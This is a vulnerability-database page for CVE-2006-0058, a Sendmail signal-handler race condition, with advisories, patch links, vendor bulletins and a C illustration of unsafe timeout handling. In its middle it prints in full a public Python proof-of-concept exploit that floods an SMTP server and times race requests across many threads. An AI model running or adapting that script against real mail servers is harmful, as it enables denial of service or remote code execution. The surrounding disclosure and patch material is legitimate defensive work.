CVE-2006-0058
CVSS 7.6
Published: 2006-03-22 15:06:00
Last modified: 2011-03-07 21:29:14

[Original] Signal handler race condition in Sendmail 8.13.x before 8.13.6 allows remote attackers to execute arbitrary code by triggering timeouts in a way that causes the setjmp and longjmp function calls to be interrupted and modify unexpected memory locations.


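[CNNVD] Sendmail asynchronous signal handling race condition vulnerability (CNNVD-200603-374)

        Sendmail is a mail transfer agent (MTA) used by many large sites.
        Sendmail has a signal race vulnerability when it receives and processes mail data from a remote client; a remote attacker may exploit it to execute arbitrary commands on the server.
        Sendmail handles timeouts with a signal handler in a way that is not async-signal-safe. When this handler interrupts certain functions, static data elements can be left in an inconsistent state. An attacker can use these data elements to write data to invalid parts of the heap or stack and so take full control of the vulnerable process.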
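
The failure mode described above, as an added illustration in C (not Sendmail's source and not part of the original record): a timeout handler that jumps out of code halfway through updating static data, next to a handler that only sets a flag. The buffer, the function names and the raise() call standing in for an expiring timer are constructed for this example.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>

/* Constructed model, not Sendmail code: static state with the invariant
 * len == strlen(buf), updated in two steps. */
static char   buf[64];
static size_t len;

static sigjmp_buf            timeout_env;
static volatile sig_atomic_t timed_out;

/* Unsafe pattern: abandon whatever was running and jump to the recovery path. */
static void jump_handler(int sig) { (void)sig; siglongjmp(timeout_env, 1); }

/* Safe pattern: only record that the timeout happened. */
static void flag_handler(int sig) { (void)sig; timed_out = 1; }

static void install(void (*handler)(int))
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = handler;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGALRM, &sa, NULL);
}

static void reset_state(void)
{
    memset(buf, 0, sizeof buf);
    len = 0;
    timed_out = 0;
}

/* Append s to buf. When fire_mid_update is set, raise(SIGALRM) stands in for
 * a timer expiring between the two halves of the update. */
static void append(const char *s, int fire_mid_update)
{
    size_t n = strlen(s);
    if (len + n >= sizeof buf)
        return;
    len += n;                         /* step 1: bookkeeping */
    if (fire_mid_update)
        raise(SIGALRM);
    memcpy(buf + len - n, s, n);      /* step 2: data */
    buf[len] = '\0';
}

static int state_is_consistent(void) { return len == strlen(buf); }

/* Returns 1 if the static state is still consistent after the timeout. */
int run_with_jump_handler(void)
{
    reset_state();
    install(jump_handler);
    if (sigsetjmp(timeout_env, 1) == 0) {
        append("MAIL", 0);
        append(" FROM", 1);           /* handler jumps out after step 1 */
    }
    /* Recovery path: len claims 9 bytes, buf holds only "MAIL". */
    return state_is_consistent();
}

/* Returns 1 if the timeout was seen and the state is still consistent. */
int run_with_flag_handler(void)
{
    reset_state();
    install(flag_handler);
    append("MAIL", 0);
    append(" FROM", 1);               /* handler returns, update completes */
    /* Safe point: act on the timeout only between complete operations. */
    return timed_out && state_is_consistent();
}

int main(void)
{
    printf("jump handler: consistent=%d\n", run_with_jump_handler());
    printf("flag handler: consistent=%d\n", run_with_flag_handler());
    return 0;
}
```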

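- CVSS (base score)

CVSS score: 7.6 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: HIGH [specialized access conditions exist for exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]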

- CPE (affected platforms and products)

cpe:/a:sendmail:sendmail:8.13.1  Sendmail Sendmail 8.13.1
cpe:/a:sendmail:sendmail:8.13.5  Sendmail Sendmail 8.13.5
cpe:/a:sendmail:sendmail:8.13.4  Sendmail Sendmail 8.13.4
cpe:/a:sendmail:sendmail:8.13.3  Sendmail Sendmail 8.13.3
cpe:/a:sendmail:sendmail:8.13.0  Sendmail Sendmail 8.13.0
cpe:/a:sendmail:sendmail:8.13.2  Sendmail Sendmail 8.13.2

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1689  Sendmail setjmp longjmp bo (Red Hat Internal)
oval:org.mitre.oval:def:11074  Signal handler race condition in Sendmail 8.13.x before 8.13.6 allows remote attackers to execute arbitrary code by triggering timeouts in a...
*OVAL describes in detail how to detect this vulnerability; more technical detail on detection can be found in the related OVAL definitions.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0058
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0058
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-374
(Official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA06-081A.html
(UNKNOWN)  CERT  TA06-081A
http://www.kb.cert.org/vuls/id/834865
(UNKNOWN)  CERT-VN  VU#834865
http://www.redhat.com/support/errata/RHSA-2006-0265.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2006:0265
http://www.redhat.com/support/errata/RHSA-2006-0264.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2006:0264
http://www.vupen.com/english/advisories/2006/2490
(UNKNOWN)  VUPEN  ADV-2006-2490
http://www.vupen.com/english/advisories/2006/2189
(UNKNOWN)  VUPEN  ADV-2006-2189
http://www.vupen.com/english/advisories/2006/1529
(UNKNOWN)  VUPEN  ADV-2006-1529
http://www.vupen.com/english/advisories/2006/1157
(UNKNOWN)  VUPEN  ADV-2006-1157
http://www.vupen.com/english/advisories/2006/1139
(UNKNOWN)  VUPEN  ADV-2006-1139
http://www.vupen.com/english/advisories/2006/1072
(UNKNOWN)  VUPEN  ADV-2006-1072
http://www.vupen.com/english/advisories/2006/1068
(UNKNOWN)  VUPEN  ADV-2006-1068
http://www.vupen.com/english/advisories/2006/1051
(UNKNOWN)  VUPEN  ADV-2006-1051
http://www.vupen.com/english/advisories/2006/1049
(UNKNOWN)  VUPEN  ADV-2006-1049
http://www.sendmail.com/company/advisory/index.shtml
(UNKNOWN)  CONFIRM  http://www.sendmail.com/company/advisory/index.shtml
http://www.securityfocus.com/archive/1/428536/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060322 sendmail vuln advisories (CVE-2006-0058)
http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.007-sendmail.html
(UNKNOWN)  OPENPKG  OpenPKG-SA-2006.007
http://www.iss.net/threats/216.html
(UNKNOWN)  ISS  20060322 Sendmail Remote Signal Handling Vulnerability
http://www.gentoo.org/security/en/glsa/glsa-200603-21.xml
(UNKNOWN)  GENTOO  GLSA-200603-21
http://www.debian.org/security/2006/dsa-1015
(UNKNOWN)  DEBIAN  DSA-1015
http://sunsolve.sun.com/search/document.do?assetkey=1-66-200494-1
(UNKNOWN)  SUNALERT  200494
http://secunia.com/advisories/19367
(UNKNOWN)  SECUNIA  19367
http://secunia.com/advisories/19363
(UNKNOWN)  SECUNIA  19363
http://secunia.com/advisories/19342
(UNKNOWN)  SECUNIA  19342
http://itrc.hp.com/service/cki/docDisplay.do?docId=c00692635
(UNKNOWN)  HP  HPSBTU02116
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c00629555
(UNKNOWN)  HP  HPSBUX02108
http://xforce.iss.net/xforce/xfdb/24584
(UNKNOWN)  XF  smtp-timeout-bo(24584)
http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=2751
(UNKNOWN)  CONFIRM  http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=2751
http://www14.software.ibm.com/webapp/set2/sas/f/hmc/power5/install/v52.Readme.html#MH00688
(UNKNOWN)  CONFIRM  http://www14.software.ibm.com/webapp/set2/sas/f/hmc/power5/install/v52.Readme.html#MH00688
http://www.securityfocus.com/bid/17192
(UNKNOWN)  BID  17192
http://www.securityfocus.com/archive/1/archive/1/428656/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:186277
http://www.redhat.com/archives/fedora-announce-list/2006-April/msg00018.html
(UNKNOWN)  FEDORA  FEDORA-2006-193
http://www.redhat.com/archives/fedora-announce-list/2006-April/msg00017.html
(UNKNOWN)  FEDORA  FEDORA-2006-194
http://www.osvdb.org/24037
(UNKNOWN)  OSVDB  24037
http://www.openbsd.org/errata38.html#sendmail
(UNKNOWN)  OPENBSD  [3.8] 006: SECURITY FIX: March 25, 2006
http://www.novell.com/linux/security/advisories/2006_17_sendmail.html
(UNKNOWN)  SUSE  SUSE-SA:2006:017
http://www.mandriva.com/security/advisories?name=MDKSA-2006:058
(UNKNOWN)  MANDRIVA  MDKSA-2006:058
http://www.f-secure.com/security/fsc-2006-2.shtml
(UNKNOWN)  CONFIRM  http://www.f-secure.com/security/fsc-2006-2.shtml
http://www.ciac.org/ciac/bulletins/q-151.shtml
(UNKNOWN)  CIAC  Q-151
http://www-1.ibm.com/support/search.wss?rs=0&q=IY82994&apar=only
(UNKNOWN)  AIXAPAR  IY82994
http://www-1.ibm.com/support/search.wss?rs=0&q=IY82993&apar=only
(UNKNOWN)  AIXAPAR  IY82993
http://www-1.ibm.com/support/search.wss?rs=0&q=IY82992&apar=only
(UNKNOWN)  AIXAPAR  IY82992
http://support.avaya.com/elmodocs2/security/ASA-2006-078.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-078.htm
http://support.avaya.com/elmodocs2/security/ASA-2006-074.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-074.htm
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102324-1
(UNKNOWN)  SUNALERT  102324
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102262-1
(UNKNOWN)  SUNALERT  102262
http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.619600
(UNKNOWN)  SLACKWARE  SSA:2006-081-01
http://securitytracker.com/id?1015801
(UNKNOWN)  SECTRACK  1015801
http://securityreason.com/securityalert/743
(UNKNOWN)  SREASON  743
http://securityreason.com/securityalert/612
(UNKNOWN)  SREASON  612
http://secunia.com/advisories/20723
(UNKNOWN)  SECUNIA  20723
http://secunia.com/advisories/20243
(UNKNOWN)  SECUNIA  20243
http://secunia.com/advisories/19774
(UNKNOWN)  SECUNIA  19774
http://secunia.com/advisories/19676
(UNKNOWN)  SECUNIA  19676
http://secunia.com/advisories/19533
(UNKNOWN)  SECUNIA  19533
http://secunia.com/advisories/19532
(UNKNOWN)  SECUNIA  19532
http://secunia.com/advisories/19466
(UNKNOWN)  SECUNIA  19466
http://secunia.com/advisories/19450
(UNKNOWN)  SECUNIA  19450
http://secunia.com/advisories/19407
(UNKNOWN)  SECUNIA  19407
http://secunia.com/advisories/19404
(UNKNOWN)  SECUNIA  19404
http://secunia.com/advisories/19394
(UNKNOWN)  SECUNIA  19394
http://secunia.com/advisories/19368
(UNKNOWN)  SECUNIA  19368
http://secunia.com/advisories/19361
(UNKNOWN)  SECUNIA  19361
http://secunia.com/advisories/19360
(UNKNOWN)  SECUNIA  19360
http://secunia.com/advisories/19356
(UNKNOWN)  SECUNIA  19356
http://secunia.com/advisories/19349
(UNKNOWN)  SECUNIA  19349
http://secunia.com/advisories/19346
(UNKNOWN)  SECUNIA  19346
http://secunia.com/advisories/19345
(UNKNOWN)  SECUNIA  19345
ftp://patches.sgi.com/support/free/security/advisories/20060401-01-U
(UNKNOWN)  SGI  20060401-01-U
ftp://patches.sgi.com/support/free/security/advisories/20060302-01-P
(UNKNOWN)  SGI  20060302-01-P
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.24/SCOSA-2006.24.txt
(UNKNOWN)  SCO  SCOSA-2006.24
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2006-010.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2006-010
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:13.sendmail.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-06:13

- Vulnerability information

Sendmail asynchronous signal handling race condition vulnerability
High risk  Race condition
2006-03-22 00:00:00 2006-03-27 00:00:00
Remote

- Advisories and patches

        The vendors have released upgrade patches that fix this security issue. Patch download links:
        OpenBSD OpenBSD 3.0
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patch
        IBM AIX 5.1
        IBM IY82992
        AIX 5.1.0:
        http://www.ibm.com/servers/eserver/support/unixservers/aixfixes.html
        IBM sendmail_vu834865.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/sendmail_vu834865.tar.Z
        HP HP-UX B.11.11
        HP PHNE_35484
        http://itrc.hp.com
        OpenBSD OpenBSD 3.1
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patch
        HP HP-UX B.11.00
        HP PHNE_35483
        http://itrc.hp.com
        OpenBSD OpenBSD 3.5
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patch
        OpenBSD OpenBSD 2.3
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patch
        OpenBSD OpenBSD 2.5
        OpenBSD 001_sendmail.patch
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/001_sendmail.patch
        FreeBSD FreeBSD 4.8 -PRERELEASE
        FreeBSD sendmail.patch
        sendmail.patch has been verified to apply to FreeBSD 5.1, 4.8, and 4.7 systems.
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:13/sendmail.patch
        FreeBSD sendmail.patch.asc
        sendmail.patch has been verified to apply to FreeBSD 5.1, 4.8, and 4.7 systems.
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:13/sendmail.patch.asc
        FreeBSD FreeBSD 4.8
        FreeBSD sendmail.patch
        sendmail.patch has been verified to apply to FreeBSD 5.1, 4.8, and 4.7 systems.
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:13/sendmail.patch
        FreeBSD sendmail.patch.asc
        sendmail.patch has been verified to apply to FreeBSD 5.1, 4.8, and 4.7 systems.
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:13/sendmail.patch.asc
        SCO Unixware 7.1.4
        SCO SCOSA-2006.24
        UnixWare 7.1.3, 7.14
        ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.24
        Sendmail Consortium Sendmail 8.11.2
        Sendmail Consortium Sendmail 8.13.6
        ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.13.6.tar.gz
        Sendmail Consortium Sendmail 8.12 beta5
        Sendmail Consortium Sendmail 8.13.6
        ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.13.6.tar.gz
        Sendmail Consortium Sendmail 8.12.1
        Mandriva sendmail-8.12.11-1.1.M20mdk.i586.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-8.12.11-1.1.M20mdk.src.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-cf-8.12.11-1.1.M20mdk.i586.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-devel-8.12.11-1.1.M20mdk.i586.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-doc-8.12.11-1.1.M20mdk.i586.rpm
        Multi Network Firewall 2.0:
        http://www.mandriva.com/en/download
        Sendmail Consortium Sendmail 8.13.6
        ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.13.6.tar.gz
        Slackware sendmail-8.13.6-i486-1.tgz
        Slackware 9.1:
        ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/sendmail-8.13.6-i486-1.tgz
        Slackware sendmail-cf-8.13.6-noarch-1.tgz
        Slackware 9.1:
        ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/sendmail-8.13.6-i486-1.tgz
        Sendmail Consortium Sendmail 8.12.11
        Mandriva sendmail-8.12.11-1.1.C30mdk.i586.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-8.12.11-1.1.C30mdk.src.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-8.12.11-1.1.C30mdk.x86_64.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-cf-8.12.11-1.1.C30mdk.i586.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-cf-8.12.11-1.1.C30mdk.x86_64.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-devel-8.12.11-1.1.C30mdk.i586.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-devel-8.12.11-1.1.C30mdk.x86_64.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-doc-8.12.11-1.1.C30mdk.i586.rpm
        Corporate 3.0:
        http://www.mandriva.com/en/download
        Mandriva sendmail-doc-8.12.11-1.1.C30mdk.x86_64.

- Vulnerability information (2051)

Sendmail <= 8.13.5 Remote Signal Handling Exploit PoC (EDBID:2051)
linux dos
2006-07-21 Verified
0 redsand
N/A
#!/usr/bin/env python
#
# redsand@blacksecurity.org
# Sendmail 8.13.5 and below Remote Signal Handling exploit
# usage: rbl4ck-sendmail.py 127.0.0.1 0 25
#
#

# this exploit was leaked to the PHC (Phrack High Council)
# so instead of only letting them have a copy, we figure
# everyone should have what they have.
#
# :-)

#
# several of the tested operating systems appear to crash at a static
# string in memory and we were unable to shift the location of that crash.
# However, Fedora gives us a nice sexy soft spot to land, one that allows us
# to control the flow of code execution
# this is only a proof of concept
#

import os, sys, socket, time, select, string, errno, threading

IP="127.0.0.1"
PORT=25
fromdd = "w00t@bex.redsand.net"
def_arch = 0
def_timeout = (60 * 60) * 2 # 2 hrs
#def_timeout = 5 # 5 seconds
domain = "localhost"
total_time = None
threshold = 2.5

guess_timeout = 4.0

threads = 40

arch = [ 
	{ 'OS':'Debian 3.0-r1', 'offset':190, 'pad':28, 'return':0xbfbfdad1L }
	]

argc = len(sys.argv)
if(argc > 1):
	IP = sys.argv[1]

if(argc > 2):
	def_arch = int(sys.argv[2])

if(argc > 3):
	PORT = int(sys.argv[3])

def	ia32(o):
	s=''
	w=chr(i % 256)
	o = o >> 8
	x=chr(i % 256)
	o = o >> 8
	y=chr(i % 256)
	o = o >> 8
	z=chr(i % 256)

	s = "%c%c%c%c" % (w,x,y,z)
	return s

def	substr(i, str, off):
	top=i[:off]
	end=i[off+len(str):]
	s = top + str + end
	return s
	


def	rout( str):
	print ("[bl4ck]: " + str)

def	mbanner():
	rout("Sendmail 8.13.5 and below Remote Signal Handling exploit by redsand@blacksecurity.org")
	rout("Supported Operating Systems:")
	p = 0
	for i in arch:
		rout("{%r} %s" % (p, i['OS']))
		p += 1

def	rsend( s, str, p=True):
	sent = s.send(str )
	#sent = s.send(str + "\r\n")
	if sent == 0:
		rout("socket send() failed")
	if(p):
		rout("Sent Request: \r\n\r\n%s\r\n" % str)

def	probe(sock):
	str = "HELO blacksecurity.org\r\nMAIL FROM: <%s>\r\nRCPT TO: root@%s\r\nDATA\r\n" % (fromdd,domain)
	rsend(sock,str)


def	payload(size=32764):
	ret = "\x7f" * size
	i = 0
	while i < size :
		ret = substr(ret,": ",100 + i)
		ret = substr(ret,"\r\n",200 + i)
		i += 202

	ret += "\r\n"
	return ret


class rSendmail( threading.Thread) :

	thres = threshold
	do_exit = False
	btime = None
	etime = None
	state = 0
	total_time = 0

	def	__init__(self, thresh=0):
		if not thresh == 0:
			self.thres = thresh
		threading.Thread.__init__ ( self )


	def     rrecv(self,s, response=None):
        	buf = ''
        	try:
	                buf = s.recv(2048)
	        except socket.error, (ecode, reason):
	                #rout("Socket failure %r:%s" % (ecode, reason))
	                return False

        	if buf == '':
                	return False

        	rout("Reading response: \r\n\r\n%s\r\n" % buf[0:-2])
       		msg = buf[0:-2].split("\r\n")
        	for m in msg:

                	k = m[0:3]
                	if (k != None) and (k != '') and (k != "\x7f\x7f\x7f"):
                        	code = int(m[0:3])
                	else:
                        	code = 0

                	if( code == 354 and self.state == 0 ):
                        	self.btime = time.time()
                        	self.state += 1
                        	return True
                	elif( code == 451 and self.state == 1):
                        	self.etime = time.time()
                        	self.state += 1
	                        return True
       	        	elif( code == 451 and self.state == 4):
                        	self.state += 1
                        	return True
                	elif( code == 354 and self.state == 3):
                        	self.state += 1
                        	return True

                	if (self.state == 5):
                        	self.state += 1
                        	rout("Debug error, unable to escalate state")
				self.stop()
				return False

	        if(response != None):
       	        	rsend(s,response)

	def stop(self):
		self.do_exit = True


	def run (self ):

		rout("Connecting to %s:%r" % (IP,PORT))

		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		sock.setblocking(0) # non-blocking 0hn0

		try:
			sock.connect((IP, PORT))
		except socket.error, (ecode, reason):
			if ecode in (115, 150): pass
			else:
				rout("Error %r:%s" % (ecode,reason))
				return
	
			ret = select.select([sock],[sock],[], def_timeout)
	
			if len(ret[1]) == 0 and len (ret[0]) == 0:
				sock.close()
				rout("Timed out on connect")
				return
	
		rout("Setting non-blocking options with a default timeout of %r seconds" % def_timeout)
	
		xplbuf = "\xAF\xBE\xAD\xDE"

		probe1 = False
		probe2 = False
		pump = False
	
		while not self.do_exit:
		
			readsock, writesock, err = select.select([sock],[sock],[], def_timeout)
			if len(readsock) > 0:
				for s in readsock:
					self.rrecv(s)
	
			if len(writesock) > 0:
				for s in writesock:
					if(self.state == 0):
						if not probe1:
							probe(s) # rsend(s,"HELO")
							probe1 = True
						break
	
					if(self.state == 1):
						if not pump:
							pump = True
							time.sleep(guess_timeout - (0.9))
							rsend(s,payload(32764) + "\r\n", False)
							rout("Sending heavy load")
	
						break
	
					if(self.state == 2):
					# measure timeout
					# wait = end - start  
					# where end is time of code 451 & start is 354 go ahead
						self.total_time = (self.etime - self.btime) + self.thres
						#self.total_time = (self.etime - self.btime)
						self.state += 1
		
					if(self.state == 3):
						if not probe2:
							rsend(s,"\n")
							probe(s)
							probe2 = True
						break
		
					if(self.state == 4):
						## race here
						# send bad header
						# lets wait 
						rsend(s, xplbuf + "\r\n")
						rout("Sleeping...")
						time.sleep(self.total_time)
						rsend(s, xplbuf + "\r\n")
		
						rout("Sent race-request")
						self.state = 5
						break
		
					if(self.state == 5):
						rout("State reached stage: %r" % self.state)
						rout("Total wait time: %s" % self.total_time)
						self.stop()
						break

		self.stop()
		return
					



mbanner()

t_list = []

t = threshold

opc = 0

while threading.activeCount() < threads:
	opc += 1 
	rout("Starting Thread: %r with time+offset: %r" % (opc, t))
        m = rSendmail(t)
        m.start()
        t += 0.2
	time.sleep(5)


sys.exit(5) # success ??

"""
buf = ""
atom = "\\\xff" * int(arch[def_arch]['pad'])
idx = 256 * 4
newtag=substr(xpl[idx:],ia32(arch[def_arch]['return']), int(arch[def_arch]['offset']))
xpl=substr(xpl, newtag, idx)
xpl=substr(xpl,atom,len(xpl))
"""

# milw0rm.com [2006-07-21]
		

- Vulnerability information (F48476)

rbl4ck_sendmail.tgz (PacketStormID:F48476)
2006-07-24 00:00:00
redsand  blacksecurity.org
exploit,remote
CVE-2006-0058

Remote signal handling exploit for Sendmail versions 8.13.5 and below.

- Vulnerability information (F46614)

SCOSA-2006.24.txt (PacketStormID:F46614)
2006-05-24 00:00:00
SCO  sco.com
advisory,remote,arbitrary,root
CVE-2006-0058

SCO Security Advisory SCOSA-2006.24 - Sendmail could allow a remote attacker to execute arbitrary code as root, caused by a signal race vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________


                        SCO Security Advisory


Subject:                Sendmail Arbitrary Code Execution Vulnerability
Advisory number:        SCOSA-2006.24
Issue date:             2006 May 21
Cross reference:        fz533700
                        CVE-2006-0058
______________________________________________________________________________


1. Problem Description

        Sendmail could allow a remote attacker to execute arbitrary code as
        root, caused by a signal race vulnerability. 
	
        The Common Vulnerabilities and Exposures project
        (cve.mitre.org) has assigned the name CVE-2006-0058 to
        this issue.


2. Vulnerable Supported Versions

        System                          Binaries
        ----------------------------------------------------------------------
        UnixWare 7.1.3                  sendmail
                                        mailstats
                                        praliases
                                        rmail
                                        smrsh
                                        makemap
        UnixWare 7.1.4                  sendmail
                                        mailstats
                                        praliases
                                        rmail
                                        smrsh
                                        makemap


3. Solution

        The proper solution is to install the latest packages.


4. UnixWare 7.1.3

        4.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.24


        4.2 Verification

        MD5 (p533700.713.image) = 2c33879a5f676c79efe1e78cadb2aeb8

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools


        4.3 Installing Fixed Binaries

        The following packages should be installed on your system before
        you install this fix:

                UnixWare 7.1.3 Maintenance Pack 5
                http://www.sco.com/support/update/download/release.php?rid=96

        Upgrade the affected binaries with the following sequence:

        Download p533700.713.image to the /var/spool/pkg directory

        # pkgadd -d /var/spool/pkg/p533700.713.image


5. UnixWare 7.1.4

        5.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.24


        5.2 Verification

        MD5 (p533700.714.image) = 0a3a7c95a68e1ca3e5916e40e9dfa0ae

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools


        5.3 Installing Fixed Binaries

        The following packages should be installed on your system before
        you install this fix:

                UnixWare 7.1.4 Maintenance Pack 3
                http://www.sco.com/support/update/download/release.php?rid=126

        Upgrade the affected binaries with the following sequence:

        Download p533700.714.image to the /var/spool/pkg directory

        # pkgadd -d /var/spool/pkg/p533700.714.image


6. References

        Specific references for this advisory:
                http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0058
                http://www.securityfocus.com/archive/1/428536/100/0/threaded
                http://www.sendmail.org/

        SCO security resources:
                http://www.sco.com/support/security/index.html

        SCO security advisories via email
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents fz533700.


7. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers intended
        to promote secure installation and use of SCO products.


8. Acknowledgments

        Marc Bejarano is credited with the discovery of this vulnerability.


______________________________________________________________________________
    

- Vulnerability information (F46511)

HP Security Bulletin 2006-11.33 (PacketStormID:F46511)
2006-05-22 00:00:00
Hewlett Packard  hp.com
advisory,remote,arbitrary
CVE-2006-0058

HP Security Bulletin - A vulnerability has been identified in Sendmail which may allow a remote attacker to execute arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00629555

Version: 11

HPSBUX02108 SSRT061133 rev.11 - HP-UX Running Sendmail,
Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2006-05-03
Last Updated: 2006-05-18

Potential Security Impact: Remote Execution of Arbitrary Code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A vulnerability has been identified in Sendmail which may allow a
remote attacker to execute arbitrary code.

References: CVE-2006-0058

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.11, B.11.23.

BACKGROUND

CERT has published a vulnerability report available at:
http://www.kb.cert.org/vuls/id/834865

This bulletin will be revised as other versions of Sendmail
become available.

To determine if an HP-UX system has an affected version,
search the output of "swlist -a revision -l fileset"
for one of the filesets listed below. For affected systems
verify that the recommended action has been taken.

AFFECTED VERSIONS

For sendmail 8.13.3
HP-UX B.11.23
==========
SMAIL-UPGRADE.INET-SMAIL
SMAIL-UPGRADE.INET2-SMAIL
action: install revision B.11.23.01.002 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
URL: ftp://sendmail:sendmail@hprc.external.hp.com/sendmail-8.13_1123.depot

HP-UX B.11.11
==========
SMAIL-UPGRADE.INETSVCS-SMAIL
action: install revision B.11.11.02.002 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
URL: ftp://sendmail:sendmail@hprc.external.hp.com/sendmail-8.13_1111.depot

For sendmail 8.11.1
HP-UX B.11.23
==========
InternetSrvcs.INETSVCS2-RUN
 ->action: remove UNOF_INET31734_3.depot if installed,
install UNOF_INET31734_4.depot or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
 ->URL: ftp://sendmail:sendmail@hprc.external.hp.com/UNOF_INET31734_4.depot

HP-UX B.11.11
==========
SMAIL-811.INETSVCS-SMAIL
 ->action: install revision B.11.11.01.009 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
 ->URL: ftp://sendmail:sendmail@hprc.external.hp.com/sendmail-811_09.depot

HP-UX B.11.00
==========
SMAIL-811.INETSVCS-SMAIL
 ->action: install revision B.11.00.01.008 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.
 ->URL: ftp://sendmail:sendmail@hprc.external.hp.com/sendmail-811_01.008.depot

For sendmail 8.9.3
HP-UX B.11.11
==========
InternetSrvcs.INETSVCS-RUN
 ->action: remove UNOF_INET_29774_3.depot if installed,
install PHNE_31917 or subsequent,
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions.

HP-UX B.11.00
==========
InternetSrvcs.INETSVCS-RUN
 ->action: remove UNOF_INET_29773_3.depot if installed,
install PHNE_32006 or subsequent,
